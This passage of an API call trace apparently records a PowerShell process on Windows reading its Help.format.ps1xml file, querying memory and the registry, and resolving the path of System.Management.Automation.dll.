lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0135.473] SetErrorMode (uMode=0x1) returned 0x1 [0135.473] SetErrorMode (uMode=0x1) returned 0x1 [0135.473] GetFileType (hFile=0x308) returned 0x1 [0135.473] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.475] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.475] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.475] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.476] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.476] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.476] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.476] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.477] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.477] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.477] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.477] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.477] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.478] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.478] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.479] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.480] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.480] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.480] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.480] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.480] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.480] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.480] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.481] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.481] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.481] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.481] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.481] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.481] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.481] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.482] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.482] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.483] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.484] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.484] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.484] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.484] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.484] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0135.485] SetErrorMode (uMode=0x1) returned 0x1 [0135.485] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0135.486] SetErrorMode (uMode=0x1) returned 0x1 [0135.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0135.486] CoTaskMemAlloc (cb=0x5a) returned 0x1b80a970 [0135.486] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1b80a970, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.486] CoTaskMemFree (pv=0x1b80a970) [0135.486] RegCloseKey (hKey=0x308) returned 0x0 [0135.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0135.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0135.494] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xdab88247, Data2=0x4de8, Data3=0x45cd, Data4=([0]=0x9a, [1]=0xa0, [2]=0x62, [3]=0x8d, [4]=0x29, [5]=0xa1, [6]=0x1d, [7]=0x88))) returned 0x0 [0135.494] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xf9fe0b0a, Data2=0x7ee1, Data3=0x4f11, Data4=([0]=0xb6, [1]=0xbb, [2]=0x6e, [3]=0xe7, [4]=0x13, [5]=0x73, [6]=0x5a, [7]=0xad))) returned 0x0 [0135.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.552] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x758b44bc, Data2=0x76, Data3=0x45a2, Data4=([0]=0xad, [1]=0xa2, [2]=0x9f, [3]=0x5, [4]=0xa2, [5]=0x4a, [6]=0x22, [7]=0xaf))) returned 0x0 [0135.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.556] VirtualQuery (in: lpAddress=0xcb300, lpBuffer=0xcc1c0, dwLength=0x30 | out: lpBuffer=0xcc1c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.557] VirtualQuery (in: lpAddress=0xcb390, lpBuffer=0xcc250, dwLength=0x30 | out: lpBuffer=0xcc250*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.558] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, 